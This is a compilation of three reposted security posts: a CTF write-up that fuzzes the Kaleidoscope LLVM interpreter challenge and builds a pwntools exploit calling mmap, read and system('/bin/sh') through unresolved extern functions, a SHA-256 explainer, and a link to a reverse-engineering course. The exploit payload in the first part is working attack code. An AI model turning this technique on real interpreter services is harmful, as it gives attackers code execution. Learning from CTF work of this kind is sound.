matthew@matthew-MS-7A37 /m/d/L/Fuzz> afl-fuzz -i in/ -o out1/ -Q -- ./wang
afl-fuzz 2.52b by <lcamtuf@google.com>
[+] You have 8 CPU cores and 6 runnable tasks (utilization: 75%).
[+] Try parallel jobs - see /usr/local/share/doc/afl/parallel_fuzzing.txt.
[*] Checking CPU core loadout...
[+] Found a free CPU core, binding to #0.
[*] Checking core_pattern...
[*] Setting up output directories...
[+] Output directory exists but deemed OK to reuse.
[*] Deleting old session data...
[+] Output dir cleanup successful.
[*] Scanning 'in/'...
[+] No auto-generated dictionary tokens to reuse.
[*] Creating hard links for all input files...
[*] Validating target binary...
[*] Attempting dry run with 'id:000000,orig:1.txt'...
[*] Spinning up the fork server...
[+] All right - fork server is up. ...(It just stop here) Then I try honggfuzz, which is another popular fuzzer support binary instrument. At first I cloned the source code from github but failed on compilation. Then I found a docker image at Doker hub, but it does not support qemu mode. I had to attach to the container and complied the qemu mode, some dependencies installation are unavoidable. It took me more than 2 hours to setup this tool (the network connection is always big problem when you setting up similar tools in China). The command of running this docker image is: docker run --rm -it -v (pwd):/work --privileged zjuchenyuan/honggfuzz:latest /bin/bash and you can find the usage of honggfuzz here: USAGE, for the qemu mode we need, it can be run by: honggfuzz -f /work/in/ -s -- ./qemu_mode/honggfuzz-qemu/x86_64-linux-user/qemu-x86_64 /work/kaleidoscope The seed corpus was put in /work/in, I simply chose the code snippet from https://llvm.org/docs/tutorial/OCamlLangImpl1.html#the-basic-language: # Compute the x'th fibonacci number. def fib(x) if x < 3 then 1 else fib(x-1)+fib(x-2) # This expression will compute the 40th number. fib(40) I run this in a vmware workstation vm, so the speed is a kind of slow, but it still give us some crashes in less than ten minutes. I believe this will be much faster on a bare metal linux machine. Iterations : 5810 [5.81k] Mode [3/3] : Feedback Driven Mode Target : ./qemu_mode/honggfuzz-qemu/x86_6.....u-x86_64 /work/kaleidoscope Threads : 4, CPUs: 8, CPU%: 424% [53%/CPU] Speed : 0/sec [avg: 1] Crashes : 200 [unique: 0, blacklist: 0, verified: 0] Timeouts : 0 [10 sec] Corpus Size : 97, max: 8192 bytes, init: 2 files Cov Update : 0 days 00 hrs 01 mins 18 secs ago Coverage : edge: 3922/45011 [8%] pc: 1541 cmp: 135658 Crashes The fuzzer gave us a crash in less than ten minutes, I review the crashes, it seems like some heap corruption issue, but the stacktrace was hard to look at. ─────────────────────────────────[ REGISTERS ]────────────────────────────────── RAX 0x0 RBX 0x7ffff399b840 (stderr) —▸ 0x7ffff399b680 (_IO_2_1_stderr_) ◂— 0xfbad2887 RCX 0x7ffff35ede97 (raise+199) ◂— mov rcx, qword ptr [rsp + 0x108] RDX 0x0 RDI 0x2 RSI 0x7fffffffd660 ◂— 0x0 R8 0x0 R9 0x7fffffffd660 ◂— 0x0 R10 0x8 R11 0x246 R12 0x5555556030b0 —▸ 0x5555555d4fd0 —▸ 0x5555555d5040 ◂— 0x0 R13 0x7ffff3ff9550 (std::bad_alloc::~bad_alloc()) ◂— mov rax, qword ptr [rip + 0x3390f1] R14 0x55555569ec40 —▸ 0x5555555ef820 —▸ 0x5555555c70e0 —▸ 0x5555555f7700 —▸ 0x5555555f76c0 ◂— ... R15 0x55555569ec30 —▸ 0x55555569ec40 —▸ 0x5555555ef820 —▸ 0x5555555c70e0 —▸ 0x5555555f7700 ◂— ... 
RBP 0x7ffff40dbfe2 ◂— jae 0x7ffff40dc058 /* u'std::bad_alloc' */ RSP 0x7fffffffd660 ◂— 0x0 RIP 0x7ffff35ede97 (raise+199) ◂— mov rcx, qword ptr [rsp + 0x108] ───────────────────────────────────[ DISASM ]─────────────────────────────────── ► 0x7ffff35ede97 <raise+199> mov rcx, qword ptr [rsp + 0x108] <0x7ffff35ede97> 0x7ffff35ede9f <raise+207> xor rcx, qword ptr fs:[0x28] 0x7ffff35edea8 <raise+216> mov eax, r8d 0x7ffff35edeab <raise+219> jne raise+252 <0x7ffff35edecc> ↓ 0x7ffff35edecc <raise+252> call __stack_chk_fail <0x7ffff36e3c80> 0x7ffff35eded1 nop word ptr cs:[rax + rax] 0x7ffff35ededb nop dword ptr [rax + rax] 0x7ffff35edee0 <killpg> test edi, edi 0x7ffff35edee2 <killpg+2> js killpg+16 <0x7ffff35edef0> 0x7ffff35edee4 <killpg+4> neg edi 0x7ffff35edee6 <killpg+6> jmp 0x7ffff35ee180 <0x7ffff35ee180> ───────────────────────────────────[ STACK ]──────────────────────────────────── 00:0000│ rsi r9 rsp 0x7fffffffd660 ◂— 0x0 01:0008│ 0x7fffffffd668 —▸ 0x7ffff399b420 (main_arena+2016) —▸ 0x55555567aa60 ◂— 0x0 02:0010│ 0x7fffffffd670 ◂— 0x0 ... ↓ ─────────────────────────────────[ BACKTRACE ]────────────────────────────────── ► f 0 7ffff35ede97 raise+199 f 1 7ffff35ef801 abort+321 f 2 7ffff3fef242 f 3 7ffff3ffae86 f 4 7ffff3ffaed1 f 5 7ffff3ffb105 f 6 7ffff3feeee1 f 7 55555555eb68 f 8 55555555eb68 f 9 55555555eb68 f 10 55555555eb68 pwndbg> bt #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007ffff35ef801 in __GI_abort () at abort.c:79 #2 0x00007ffff3fef242 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #3 0x00007ffff3ffae86 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #4 0x00007ffff3ffaed1 in std::terminate() () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #5 0x00007ffff3ffb105 in __cxa_throw () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #6 0x00007ffff3feeee1 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #7 0x000055555555eb68 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_construct<char*> (this=<optimized out>, __beg=0x6 <error: Cannot access memory at address 0x6>, __end=<optimized out>) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/basic_string.tcc:219 #8 std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_construct_aux<char*> (this=<optimized out>, __beg=0x6 <error: Cannot access memory at address 0x6>, __end=<optimized out>) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/basic_string.h:236 #9 std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_construct<char*> (this=<optimized out>, __beg=0x6 <error: Cannot access memory at address 0x6>, __end=<optimized out>) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/basic_string.h:255 #10 std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::basic_string (this=<optimized out>, __str=...) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/basic_string.h:440 #11 std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*>::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, 0ul>(std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>&, std::tuple<>&, std::_Index_tuple<0ul>, std::_Index_tuple<>) (this=0x55555569ec30, __tuple1=..., __tuple2=...) 
at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/tuple:1651 #12 std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*>::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>(std::piecewise_construct_t, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>, std::tuple<>) (this=0x55555569ec30, __first=..., __second=...) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/tuple:1639 #13 __gnu_cxx::new_allocator<std::_Rb_tree_node<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> > >::construct<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*>, std::piecewise_construct_t const&, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>, std::tuple<> >(std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*>*, std::piecewise_construct_t const&, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>&&, std::tuple<>&&) (__p=0x55555569ec30, __args=..., this=<optimized out>, __args=..., __args=...) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/ext/new_allocator.h:136 #14 std::allocator_traits<std::allocator<std::_Rb_tree_node<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> > > >::construct<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*>, std::piecewise_construct_t const&, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>, std::tuple<> >(std::allocator<std::_Rb_tree_node<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> > >&, std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*>*, std::piecewise_construct_t const&, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>&&, std::tuple<>&&) (__p=0x55555569ec30, __args=..., __a=..., __args=..., __args=...) 
at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/alloc_traits.h:475 #15 std::_Rb_tree<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*>, std::_Select1st<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> >, std::less<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >, std::allocator<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> > >::_M_construct_node<std::piecewise_construct_t const&, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>, std::tuple<> >(std::_Rb_tree_node<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> >*, std::piecewise_construct_t const&, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>&&, std::tuple<>&&) (this=0x5555555694c8 <NamedValues[abi:cxx11]>, __node=0x55555569ec10, __args=..., __args=..., __args=...) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/stl_tree.h:626 #16 std::_Rb_tree<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*>, std::_Select1st<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> >, std::less<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >, std::allocator<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> > >::_M_create_node<std::piecewise_construct_t const&, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>, std::tuple<> >(std::piecewise_construct_t const&, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>&&, std::tuple<>&&) (this=0x5555555694c8 <NamedValues[abi:cxx11]>, __args=..., __args=..., __args=...) 
at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/stl_tree.h:643 #17 std::_Rb_tree<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*>, std::_Select1st<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> >, std::less<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >, std::allocator<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> > >::_M_emplace_hint_unique<std::piecewise_construct_t const&, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>, std::tuple<> >(std::_Rb_tree_const_iterator<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> >, std::piecewise_construct_t const&, std::tuple<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>&&, std::tuple<>&&) (this=0x5555555694c8 <NamedValues[abi:cxx11]>, __pos={ first = <incomplete type>, second = 0x0 }, __args=..., __args=..., __args=...) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/stl_tree.h:2398 #18 0x000055555555e97d in std::map<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, llvm::AllocaInst*, std::less<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >, std::allocator<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, llvm::AllocaInst*> > >::operator[] (this=<optimized out>, __k=...) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/stl_map.h:493 #19 0x00005555555612dc in (anonymous namespace)::BinaryExprAST::codegen (this=0x555555689010) at toy.cpp:781 #20 0x000055555555c6d9 in (anonymous namespace)::FunctionAST::codegen (this=0x555555638840) at toy.cpp:1085 #21 0x000055555555a767 in HandleTopLevelExpression () at toy.cpp:1164 #22 MainLoop () at toy.cpp:1209 #23 main () at toy.cpp:1263 #24 0x00007ffff35d0b97 in __libc_start_main (main=0x55555555a240 <main()>, argc=1, argv=0x7fffffffdee8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffded8) at ../csu/libc-start.c:310 #25 0x0000555555559c4a in _start () I then went to dinner and some really interesting crashes was found before I came back. The fuzzer reports these inputs lead to crashes, but the binary did not crash at all in dry run. matthew@matthew-MS-7A37 ~/L/fuzz> cat c5 def fib(x) if x < 3 then 1 else 526142246948557=666 fib(40) $IF8׆FA]V_13X9`Z^9_O2ر/#nϰ'ӟ]* O-w ff4QjW={%IT(<V['!]h_2 ޒ*`-KyrCzʉB8Cl=}_F85&ЅNQ-O}/8 *ŋyG:~V$5917384075431139189gG ^ggXX%KTY១R| )"319Oqy` {&!M?Z-Bz X >@YAyd(9kG9Dž޹0)dL&TBeDjח@3g3N,Okrvz8b[QRs U,( >m@.*ou3\w;߳^U C}5Ttrz7217830875066176221-+\I f⏎ matthew@matthew-MS-7A37 ~/L/fuzz> cat c5 | ./kaleidoscope ready> ready> Error: Unknown variable name ready> LLVM ERROR: Program used external function 'fib' which could not be resolved! The output was interesting though, it said the external function “fib” could not be resolved. If you compare the binary code with the original source code, you can see that there was an extern keyword in the source. However the handler was disabled in this challenge, it will say “No extern function” if you try to use extern keyword. 
{ if ( CurTok != 0xFFFFFFFD ) goto LABEL_30; fwrite("No extern function!!!\n", 0x16uLL, 1uLL, *v3); CurTok = gettok(); CurTok = gettok(); LABEL_18: CurTok = gettok(); } Then I search the string Program used external function 'fib' which could not be resolved! in this binary but find nothing. However, this message was stared by a tag LLVM ERROR, did that mean the string located at the llvm library? matthew@matthew-MS-7A37 ~/L/fuzz> strings /usr/lib/x86_64-linux-gnu/libLLVM-6.0.so.1 | grep "Program used external" Program used external function ' YES! Analysis Consider the logic behind this test case, the binary have finished the parsing job and pass the function name to libLLVM, libLLVM get the function name and try to resolve it from libc. If we search this info in the source of llvm, we can see it was invoked by RTDyldMemoryManager::getPointerToNamedFunction, see https://github.com/llvm-mirror/llvm/blob/8b8f8d0ad8a1f837071ccb39fb96e44898350070/lib/ExecutionEngine/RuntimeDyld/RTDyldMemoryManager.cpp#L290. Then I thought maybe we can call the libc functions directly in same manner. I changed the fib to puts, loaded the binary into gdb and read the input. I also set a breakpoint at puts, it did stop at the call. LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────────────[ REGISTERS ]─────────────────────────────────────── RAX 0x7ffff36899c0 (puts) ◂— push r13 RBX 0x7ffff7ff6000 ◂— push rax RCX 0x3 RDX 0x55555556a010 ◂— 0x605070607050307 RDI 0x28 RSI 0x55555556a018 ◂— 0x607050702070606 R8 0x8 R9 0x1 R10 0x555555638568 —▸ 0x5555555d4f00 —▸ 0x5555555b99f0 ◂— 0x555500000000 R11 0x88 R12 0x7ffff39f5840 (stderr) —▸ 0x7ffff39f5680 (_IO_2_1_stderr_) ◂— 0xfbad2887 R13 0x555555564eb8 ◂— jb 0x555555564f1f /* 'ready> ' */ R14 0x7fffffffdd40 —▸ 0x7ffff7ff6000 ◂— push rax R15 0x7fffffffddc0 ◂— 0x0 RBP 0x7ffff39f5680 (_IO_2_1_stderr_) ◂— 0xfbad2887 RSP 0x7fffffffdd08 —▸ 0x7ffff7ff6012 ◂— pop rcx RIP 0x7ffff36899c0 (puts) ◂— push r13 ────────────────────────────────────────[ DISASM ]───────────────────────────────────────── ► 0x7ffff36899c0 <puts> push r13 0x7ffff36899c2 <puts+2> push r12 0x7ffff36899c4 <puts+4> mov r12, rdi 0x7ffff36899c7 <puts+7> push rbp 0x7ffff36899c8 <puts+8> push rbx 0x7ffff36899c9 <puts+9> sub rsp, 8 0x7ffff36899cd <puts+13> call *ABS*+0x9dc70@plt <0x7ffff362a100> 0x7ffff36899d2 <puts+18> mov rbp, qword ptr [rip + 0x36be6f] <0x7ffff39f5848> 0x7ffff36899d9 <puts+25> mov rbx, rax 0x7ffff36899dc <puts+28> mov eax, dword ptr [rbp] 0x7ffff36899df <puts+31> mov rdi, rbp ─────────────────────────────────────────[ STACK ]───────────────────────────────────────── 00:0000│ rsp 0x7fffffffdd08 —▸ 0x7ffff7ff6012 ◂— pop rcx 01:0008│ 0x7fffffffdd10 ◂— 0x0 02:0010│ 0x7fffffffdd18 —▸ 0x55555555b0d4 (main+3732) ◂— mov ecx, eax 03:0018│ 0x7fffffffdd20 —▸ 0x7fffffffdd30 ◂— '__anon_expr' 04:0020│ 0x7fffffffdd28 ◂— 0xb /* '\x0b' */ 05:0028│ 0x7fffffffdd30 ◂— '__anon_expr' 06:0030│ 0x7fffffffdd38 ◂— 0x727078 /* 'xpr' */ 07:0038│ r14 0x7fffffffdd40 —▸ 0x7ffff7ff6000 ◂— push rax ───────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────── ► f 0 7ffff36899c0 puts f 1 7ffff7ff6012 f 2 0 ─────────────────────────────────────────────────────────────────────────────────────────── Breakpoint puts pwndbg> We can see that the first argument $rdi is 0x28=40, that means we can control the argument too. Exploit With the handy arbitrary libc function calling ability, it should be quite straightforward to get a shell. 
The binary was protected by PIE, so we don't know any address information initially. My solution is to use mmap to get a new region at a known address like 0x100000, use read to load the /bin/sh string into that memory, and finally call system(0x100000) to get a shell.

payload = """ def mmap(x y z o p) if x < 3 then 1 else a=666 else 0=666 else b=666 else 0=666 else c=666 mmap(1048576, 4096, 7, 34, 0); """
sla(">", payload)
time.sleep(0.5)
payload = """ def read(x y z) if m < 3 then 1 else 0=666 def system(x) if m < 3 then 1 else 0=666 read(0, 1048576, 10); system(1048576); """
sla(">", payload)
sla(">", "/bin/sh\x00")
p.interactive()

I spent some time tuning the if-else statements to the number of arguments so that the interpreter would accept them, but later found this is unnecessary: any function definition with an if-else statement will be treated as an external function.

Wrapup

This is the first time I used fuzzing to solve a challenge during a CTF. As you can see, it is a promising skill in competition and can save plenty of reverse-engineering time. In terms of interpreter pwn challenges, I have come across some based on JavaScript, Lua (see another writeup of XNUCA2019) and this Kaleidoscope, and many of them were related to external function calling or the foreign function interface (FFI). So this might be the thing to look at when you meet an interpreter-based pwn challenge.

References
https://llvm.org/docs/tutorial/BuildingAJIT1.html
https://github.com/ghaiklor/llvm-kaleidoscope
https://hub.docker.com/r/zjuchenyuan/honggfuzz
https://github.com/google/honggfuzz/blob/master/docs/USAGE.md
https://llvm.org/docs/tutorial/OCamlLangImpl1.html#the-basic-language
http://blog.leanote.com/post/xp0int/%5BPWN%5D-ls-cpt.shao%E3%80%81MF

Sursa: http://matshao.com/2019/11/11/Redhat2019-Kaleidoscope/
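The sla/p shorthands in the payload above come from a pwntools exploit template that is not shown in full. A rough, self-contained reconstruction is sketched below — the binary path, prompt string and sleep are assumptions; the payload strings are taken verbatim from the writeup:

import time
from pwn import process

p = process("./kaleidoscope")        # or remote(host, port) against the real service

def sla(delim, data):
    # send one line after the interpreter prompt, mirroring the writeup's sla helper
    p.sendlineafter(delim.encode(), data.encode())

payload = """ def mmap(x y z o p) if x < 3 then 1 else a=666 else 0=666 else b=666 else 0=666 else c=666 mmap(1048576, 4096, 7, 34, 0); """
sla(">", payload)
time.sleep(0.5)
payload = """ def read(x y z) if m < 3 then 1 else 0=666 def system(x) if m < 3 then 1 else 0=666 read(0, 1048576, 10); system(1048576); """
sla(">", payload)
sla(">", "/bin/sh\x00")
p.interactive()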
8. Breaking Down : SHA-256 Algorithm

Looking under the hood and understanding how it works?

Aditya Anand
Nov 27 · 7 min read

Good news, folks: the article that I wrote on Breaking down: SHA-1 Algorithm has been published on PenTest Magazine's blog. It is always nice to see your work being recognized and appreciated. I am keeping my articles free for everyone to read, as I believe in the "knowledge should be free" motto. Well, let's not dwell on that and get started with the new article.

Those of you who have been following me for some time will know that I have dedicated this month to writing articles purely focused on an intricate analysis of how the most well-known hashing algorithms function and what makes one more complex than another. The articles I have written in this series so far are as follows.

Breaking Down : The series
1. Breaking Down : MD5 Algorithm
2. Breaking Down : SHA-1 Algorithm
3. Breaking Down : SHA-512 Algorithm

This is the fourth part of the series, where I break down the SHA-256 algorithm. Understanding SHA-256 is extremely easy if you already know SHA-512, as there are only minor changes in bit lengths here and there; the overall process is the same. If you want, you can have a look at my article explaining SHA-512 in detail here.

Let's begin! So, let us first start by segregating and defining the parts of the computation that we need to carry out, one after another. I personally prefer to break it down into five parts, for ease of understanding.

1. Append : Padding bits

The first step of our hashing function is appending bits to our original message, so that its length matches the standard length required by the hash function. To do so, we proceed by adding a few bits to the message that we have in hand. The number of bits we add is chosen so that, after the addition, the length of the message is exactly 64 bits less than a multiple of 512. Let me depict it in mathematical terms for better understanding.

M + P + 64 = n x 512

where
M = length of the original message (in bits)
P = number of padded bits

The bits that we append to the message should begin with a '1', and the following bits must all be '0', until we are exactly 64 bits short of a multiple of 512.

2. Append : Length bits

Now that we have appended our padding bits to the original message, we can go ahead and append the length bits – 64 bits in total – to make the entire message an exact multiple of 512. We know that we need to add 64 more bits: these are the length, in bits, of the original message (i.e. the one without the padding), taken modulo 2⁶⁴ and encoded as a 64-bit value. Appending this length to the padded bits gives us the entire message block, which must be a multiple of 512.

3. Initialize the buffers

We have our message block on which we will begin to carry out our computations to figure out the final hash. Before we begin with that, I should tell you that we need certain default values to be initialized for the steps that we are going to perform.

a = 0x6a09e667
b = 0xbb67ae85
c = 0x3c6ef372
d = 0xa54ff53a
e = 0x510e527f
f = 0x9b05688c
g = 0x1f83d9ab
h = 0x5be0cd19

Keep these values in the back of your mind for a while; in the next step everything will become clear. There are 64 more values that need to be kept in mind, which act as round constants and are denoted by 'k'.
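Before looking at the 'k' table and the compression rounds, here is a minimal Python sketch of steps 1 and 2 (padding and length append), using only the standard library; the hashlib call at the end is just a reference point for the final digest, not part of the padding itself:

import hashlib, struct

def sha256_pad(message: bytes) -> bytes:
    # Step 1: a single '1' bit (0x80) followed by '0' bits until the length
    # is 64 bits (8 bytes) short of a multiple of 512 bits (64 bytes).
    padded = message + b"\x80"
    padded += b"\x00" * ((56 - len(padded)) % 64)
    # Step 2: the 64-bit big-endian length, in bits, of the original message.
    padded += struct.pack(">Q", (len(message) * 8) % 2**64)
    return padded

msg = b"hello"
block = sha256_pad(msg)
assert len(block) % 64 == 0             # an exact multiple of 512 bits
print(len(block))                       # 64 -> a single 512-bit block
print(hashlib.sha256(msg).hexdigest())  # reference digest of the same message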
(Table of the 64 'k' constants – courtesy of the SHA-2 Wikipedia article.)

Now let's get into the part where we utilize these values to compute the hash.

4. Compression Function

The main part of the hashing algorithm lies in this step. The entire message block, which is 'n x 512' bits long, is divided into 'n' chunks of 512 bits, and each of these 512-bit chunks is then put through 64 rounds of operations; the output obtained is fed as input to the next round of operation.

In the image above we can clearly see the 64 rounds of operation that are performed on a 512-bit chunk. We can observe that the two inputs we send in are W(i) and K(i). For the first 16 rounds we simply break the 512-bit chunk down into 16 words of 32 bits each, but after that we need to calculate the value of W(i) at each step.

W(i) = Wⁱ⁻¹⁶ + σ⁰ + Wⁱ⁻⁷ + σ¹

where,
σ⁰ = ROTR⁷(Wⁱ⁻¹⁵) XOR ROTR¹⁸(Wⁱ⁻¹⁵) XOR SHR³(Wⁱ⁻¹⁵)
σ¹ = ROTR¹⁷(Wⁱ⁻²) XOR ROTR¹⁹(Wⁱ⁻²) XOR SHR¹⁰(Wⁱ⁻²)
ROTRⁿ(x) = circular right rotation of 'x' by 'n' bits
SHRⁿ(x) = logical (non-circular) right shift of 'x' by 'n' bits

Now that we have a well-established method to create W(i) for any of the 64 rounds, let's dive into what happens in each of these rounds.

Depiction of a single "round"

In the image above we can see exactly what happens in each round, and now that we have the values and the formulas for each of the functions involved, we can perform the entire hashing process.

Ch(E, F, G) = (E AND F) XOR ((NOT E) AND G)
Ma(A, B, C) = (A AND B) XOR (A AND C) XOR (B AND C)
∑(A) = (A >>> 2) XOR (A >>> 13) XOR (A >>> 22)
∑(E) = (E >>> 6) XOR (E >>> 11) XOR (E >>> 25)
+ = addition modulo 2³²
(here '>>>' denotes ROTR, a circular right rotation)

These are the functions performed in each of the 64 rounds, and the whole set of rounds is repeated for each of the 'n' chunks.

5. Output

The output from every round acts as an input for the next round, and this process continues until the last bits of the message have been processed; the result of the last round for the nᵗʰ part of the message block gives us the final result, i.e. the hash of the entire message. The length of the output is 256 bits.

Conclusion

The SHA-256 hashing algorithm is currently one of the most widely used hashing algorithms, as it hasn't been cracked yet and its hashes are calculated quickly in comparison to other secure hashes like SHA-512. It is very well established, but the industry is slowly trying to move towards SHA-512, which is considered more secure, as experts claim SHA-256 might become vulnerable in the near future.

So, let's have a second look at the entire functioning of the SHA-256 algorithm, and allow me to explain the entire thing in a single long paragraph. We calculate the length of the message that needs to be hashed, then append bits to the message, starting with a '1' followed by '0's, until the message length is exactly 64 bits less than a multiple of 512. We then add the remaining 64 bits: the length of the original message, in bits, modulo 2⁶⁴. Once we add the remaining bits, the entire message block can be represented as 'n x 512' bits. Now we pass each of these 512-bit chunks into the compression function, i.e. the set of 64 rounds of operations, where we further divide the chunk into 16 words of 32 bits each. These 16 words act as the inputs for the first 16 rounds, and for the remaining 48 rounds we have a method to calculate W(i). We also have default values for the buffers and the values of 'k' for all 64 rounds. We can now begin the computation of the hash, as we have all the values and formulas required.
The hashing process is then carried out over and over for 64 rounds, with the output of round i acting as the input to round i+1. The output of the 64ᵗʰ operation on the nᵗʰ chunk gives us the final result, i.e. the hash of the entire message.

So that's the short version of the entire operation that takes place in the SHA-256 algorithm. If you enjoyed it please do clap & let's collaborate. Get, Set, Hack!

Website : aditya12anand.com | Donate : paypal.me/aditya12anand
Telegram : https://t.me/aditya12anand
Twitter : twitter.com/aditya12anand
LinkedIn : linkedin.com/in/aditya12anand/
E-mail : aditya12anand@protonmail.com

Follow Infosec Write-ups for more such awesome write-ups.

InfoSec Write-ups
A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Written by Aditya Anand
CyberSec Professional | Hacker | Developer | Open Source Lover | Website - aditya12anand.com | Donate - paypal.me/aditya12anand

Sursa: https://medium.com/bugbountywriteup/breaking-down-sha-256-algorithm-2ce61d86f7a3
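To make the compression-function notation above concrete, here is a small Python sketch of ROTR, SHR, σ⁰/σ¹ and the message-schedule expansion for one padded 512-bit block. The block is hard-coded for the message "hello" (5 bytes + 0x80 + 50 zero bytes + 64-bit length of 40 bits); it is an illustration of the formulas, not the article's own code:

import struct

MASK = 0xFFFFFFFF
def rotr(x, n): return ((x >> n) | (x << (32 - n))) & MASK   # circular right rotation
def shr(x, n): return x >> n                                  # plain right shift
def sigma0(x): return rotr(x, 7) ^ rotr(x, 18) ^ shr(x, 3)
def sigma1(x): return rotr(x, 17) ^ rotr(x, 19) ^ shr(x, 10)

# One 64-byte (512-bit) block: "hello", padded as described in steps 1 and 2.
block = b"hello" + b"\x80" + b"\x00" * 50 + struct.pack(">Q", 40)
w = list(struct.unpack(">16I", block))        # rounds 0-15: the 16 original 32-bit words
for i in range(16, 64):                       # rounds 16-63: W(i) = W(i-16) + σ0 + W(i-7) + σ1
    w.append((w[i - 16] + sigma0(w[i - 15]) + w[i - 7] + sigma1(w[i - 2])) & MASK)
print(len(w), [hex(x) for x in w[:4]])        # 64 schedule words; first few shown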
  9. Reverse Engineering for Beginners Hey there! If you have been searching for a place to get started with Reverse Engineering and get your hands dirty - you are in the right place Note: the website is displayed optimally on Desktop browsers. Get Started Now! About Sursa: https://www.begin.re/
